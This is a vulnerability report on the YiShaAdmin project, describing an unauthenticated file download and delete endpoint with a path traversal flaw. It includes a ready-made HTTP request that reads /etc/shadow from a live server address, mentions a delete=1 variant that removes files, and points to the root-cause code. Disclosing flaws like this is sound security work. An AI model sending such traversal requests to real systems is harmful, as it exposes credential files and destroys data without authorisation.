Description

https://www.github.com/liukuo362573/yishaadmin has an endpoint "/admin/File/DownloadFile" that allows downloading/deleting files without authentication. In addition, this endpoint has path traversal vulnerability that allows arbitrary file read/delete.

Proof of Concept

• using BurpSuite and call this request

GET /admin/File/DownloadFile?filePath=wwwroot/..././/..././/..././/..././/..././/..././/..././/..././etc/shadow&delete=0 HTTP/1.1
Host: 106.14.124.170
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

• /etc/passwd file: https://drive.google.com/file/d/1OL21JE17-Q4s3a5pi4fl4W_gGOk0Vvj1/view?usp=sharing
• /etc/shadow file: https://drive.google.com/file/d/1giBmWLsVUCjejU-fN0IgJmtjShqaJ8q4/view?usp=sharing
• Disclose internal path when file doesn't exist: https://drive.google.com/file/d/1hJckqVgvXbey67hUmVUafMhXvZFqCbEf/view?usp=sharing

Root-cause

Access without authentication:

• https://github.com/liukuo362573/YiShaAdmin/blob/master/YiSha.Web/YiSha.Admin.Web/Controllers/FileController.cs#L36
• https://github.com/liukuo362573/YiShaAdmin/blob/master/YiSha.Web/YiSha.Admin.WebApi/Controllers/FileController.cs#L39

Path traversal Vuln:

https://github.com/liukuo362573/YiShaAdmin/blob/master/YiSha.Util/YiSha.Util/FileHelper.cs#L181-L186

Delete File:

Attacker can set delete=1 to delete file (file demo_1.jpg has been deleted). https://github.com/liukuo362573/YiShaAdmin/tree/master/YiSha.Util/YiSha.Util/FileHelper.cs#L190

Impact

Unauthenticated user can read or delete arbitrary file on server.